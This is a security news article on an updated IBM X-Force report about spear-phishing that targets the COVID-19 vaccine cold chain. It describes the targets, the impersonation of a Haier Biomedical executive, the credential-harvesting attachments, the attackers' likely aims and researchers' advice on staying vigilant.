Phishing Campaign Targeting COVID Vaccine 'Cold Chain' ExpandsUpdated Report From IBM Provides New Details
Cybercriminals, likely backed by nation-states, are expanding global spear-phishing campaigns targeting the COVID-19 vaccine "cold chain" in an attempt to steal credentials so they can gain "privileged insight" into sensitive information, the IBM Security X-Force says in an updated report.
See Also: Splunk Security Predictions 2021
The cold chain refers to companies involved in the delivery and storage of COVID-19 vaccines at low temperatures.
In December, the IBM Security X-Force released its original report about a phishing campaign that sought to harvest account credentials. The Cybersecurity and Infrastructure Security Agency issued an alert about that report (see: Phishing Campaign Targets COVID-19 'Cold Chain').
In an updated report issued Wednesday, IBM says it has discovered an additional 50 email message files tied to spear-phishing campaigns that targeted 44 companies in 14 countries in Europe, North America, South America, Africa and Asia that are involved in the vaccine cold chain.
"The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage and ultimate distribution of vaccines," IBM writes.
Targeting Business Leaders
The expanded spear-phishing attempts targeted CEOs, global sales officers, purchasing managers, system administrators, sales reps, HR officers, finance directors, heads of supply and logistics, heads of plant engineering, heads of marketing and export sales managers, IBM says.
“The campaign impersonates an executive from Haier Biomedical, a major Chinese biomedical company that is purported to be the world’s only complete cold chain provider," IBM notes.
The phishing emails feature a request for price quotations for service contracts, IBM writes. The emails contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.
The phishing messages apparently were created by someone with an "exceptional knowledge" of the cold chain, IBM reports.
"While our previous reporting featured direct targeting of supranational organizations and the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat.”
IBM notes that the phishing emails it initially discovered were sent between Sept. 7 and 9, several months in advance of the approval of any COVID-19 vaccine, "which indicates the attacker was prepositioning in emerging global infrastructure."
Both the email subject and contents discuss requests for price quotes and make references to Haier Biomedical’s product line to store and transport vaccines, IBM says.
"The related HTML files mention organizations involved in the manufacturing of solar panels, as well as petrochemical production - dry ice as a primary byproduct - which directly aligns with the [cold storage and transport] products."
IBM says that since December, it has uncovered additional spear-phishing email samples "remarkably similar to the original samples we found." A recently found email sample was addressed to a German pharmaceutical and bioscience solutions company involved in vaccine production that appears to be a client of one of the original targets of the campaign, the updated report notes. "This context to the initial targeted email prompted further investigation."
IBM says the initial emails and the newer ones have an overlapping command-and-control infrastructure and appear to contain "the same blurred PDF" attachment with a login screen prepopulated with the user’s email address as the ID.
"Once a user ID and password are keyed in, the credentials are sent to a C2 server," IBM writes. The phishing campaign operators apparently are seeking to harvest user credentials to use in other information-gathering attacks, according to the researchers.
The most targeted industries in the cold supply chain phishing campaign are transportation, healthcare, IT and electronics, IBM notes. But other targets appear to be associated with government organizations as well as refrigeration and metal manufacturing technology.
Seeking 'Privileged Insight'
IBM says that attackers could be looking to infiltrate the extended COVID vaccine supply chain to gain "privileged insight" into key topics. Those include negotiations surrounding the national procurement of vaccines; key timetables for distribution, including expedited passage of COVID-19 vaccines through various nations and territories; export controls and international property rights; and government measures taken to facilitate the time-sensitive cargo including pre-arrival processing.
Other information attackers might be trying to access includes collection or duplication of electronic submission of documents for pre-arrival processing; trade facilitation agreements, clearance for transport crews and security of the cargo, border crossing regulations and physical inspections; and key technical requirements surrounding warehousing and energy/electrical component requirements for maintaining temperature-controlled environments during vaccine storage, IBM says.
"While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation," IBM writes.
"The fact that vaccine supply chains are being specifically targeted is not at all surprising," says Brett Callow, a threat analyst with the security firm Emsisoft.
"Disrupting the distribution of vaccines - and delaying getting them into people’s arms - could potentially provide the criminals with an enormous payday. Unfortunately, it could also result in the loss of life."
Melissa Frydrych, an IBM Security X-Force threat hunt researcher and a co-author of the report, says all companies involved in the cold chain should stay vigilant.
"Now is the time to scrutinize everything from your partners," she says. "Pick up the phone and call them to confirm emails or unsolicited attachments are really from them."